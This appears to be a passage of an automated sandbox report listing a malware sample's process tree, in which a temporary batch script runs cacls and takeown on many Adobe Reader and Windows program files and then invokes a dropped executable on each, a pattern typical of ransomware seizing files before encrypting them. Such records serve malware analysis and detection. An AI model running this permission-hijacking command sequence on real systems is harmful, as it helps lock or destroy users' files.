- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:1136
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    - Modifies file permissions
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:1820
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      PID:1460
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1404
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:1200
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:1996
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"
    3⤵
    - Modifies file permissions
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Dotted_Line.jtp" -nobanner
    3⤵
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Dotted_Line.jtp" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"
    3⤵
    - Modifies file permissions
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Shorthand.jtp" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Shorthand.jtp" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1076
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "license.html" -nobanner
    3⤵
    PID:952
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "license.html" -nobanner
      4⤵
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    - Modifies file permissions
    PID:1076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:1820
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:1260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    - Modifies file permissions
    PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:1924
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:972
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:1136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    - Modifies file permissions
    PID:636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "rss.gif" -nobanner
    3⤵
    PID:1200
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "rss.gif" -nobanner
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    - Modifies file permissions
    PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:1996
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1644
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:924
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:1892
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:940
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    - Modifies file permissions
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    - Modifies file permissions
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    - Modifies file permissions
    PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:928
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CP1258.TXT" -nobanner
